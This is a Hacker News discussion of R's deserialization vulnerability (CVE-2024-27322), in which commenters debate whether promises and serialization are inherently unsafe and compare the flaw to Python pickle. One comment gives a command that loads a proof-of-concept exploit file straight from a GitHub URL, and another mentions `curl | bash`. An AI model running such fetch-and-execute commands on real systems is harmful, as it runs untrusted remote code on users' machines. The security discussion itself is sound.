Hacker News new | ask | show | jobs
by nomilk 764 days ago
> We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language.

Isn't this demonstrably false? I.e. run this [1]

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

and it opens the calculator application on windows/macOS (or echo's 'pwnd' on linux).

When someone can easily cause their hidden system code to run on my computer, that's a pretty serious vulnerability. read.csv() and fromJSON() do not allow this.

I happen to have packages on CRAN that readRDS() from AWS S3. So if I happen to be evil and make some trivial alterations to those RDS files to contain a hidden payload, well, it's child's play. That does not seem sane to me.

FWIW, my recommendation is to create a function like readRDS() that only reads data (and does not allow any extra code to be run), then use that in place of the traditional readRDS() on CRAN. Then if someone did craft a malicious payload, it wouldn't matter. The (harder) alternative would be to disallow any functions that have this remote code execution 'feature', e.g. only read.csv() or fromJSON() and similar.

[1] https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have...

4 comments

It's hard not to read the quote you give as basically admitting that they _can't_ entertain the idea that there are "wider security implications" because that would be tacitly admitting that the language itself is built on shaky foundations. Something being a "core feature" _increases_ the scope of any security implications, but it also makes it a lot harder to fix without having to change fundamental parts of the language, and it sounds like that would be a non-starter for them.
Edit: apparently "load" is used to deserialize some data. Ya, this is bad, nevermind. I guess treat data stored in this format as code (effectively: don't use this format) unless it can be guaranteed safe.

I'm not an R programmer, but aren't you downloading a file from the Internet and executing it?

You could do the same thing with python/JavaScript/lua. Heck, you could do it with C - download, compile and then dynamically link.

If you want security don't download files from the internet and execute them.

> aren't you downloading a file from the Internet and executing it?

Downloading, yes, executing, no, or at least not to 99% of R users’ knowledge prior to this recent occurrence.

If a malicious user tries to smuggle something into a csv or json file that isn’t possible. But when reading in an RDS it’s trivial.

I feel very uncomfortable about asking anyone to trust my code that much, even colleagues or friends, and I defnn in it ly don’t feel comfortable trusting theirs.

Their data files on the other hand are fine, I’ll gladly read their csv or json file. (would also be glad for their RDS if there’s a way to read it without also allowing for remote code execution)

I thought that deserialization for more 'language' specific serialization has always had dangers.

Python: https://docs.python.org/3/library/pickle.html Ruby: CVE-2013-0156

I'm sure there is more.

If you're using a serialized format, you get serialized risks.

Is it really execution be design? The docs don't suggest that:

>Description

>Reload datasets written with the function save.

> We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language. Isn't this demonstrably false? I.e. run this [1]

>> This does not prove the concept of promises and/or serialization are inherently unsafe core features. It simply shows there's some implementation issues to address. You go further to talk about these implementation issues which is helpful and good, but it does nothing to prove unsafeness or unsoundness of the concepts of promises or serialization/deserialization etc.

How many languages have gotten and fixed such bugs. Are those languages unsafe/unsane or were their implementations simply buggy?

Though in practice the difference isn't there, as we use language implementations, not their ideal conceptual forms, but I do think its unfair to make such claims, and say that some exploit of a langauge implementation causes the concepts within the language to be inherently exploitable.

- might be missing something, but it seems there's 2 different streams being crossed? (you do make good points about implementation imho, nothing wrong there ofc! :))

Part of this comes to trust and who/where trust decisions happen.

If I read the projects statement right, they think you should only load what you already trust.

The problem is that many people load things they just found on the Internet. Like `curl | bash` to random things people find.

Note, if it's not obvious, `curl | bash` to scripts on the Internet is just as insecure as the current R implementation.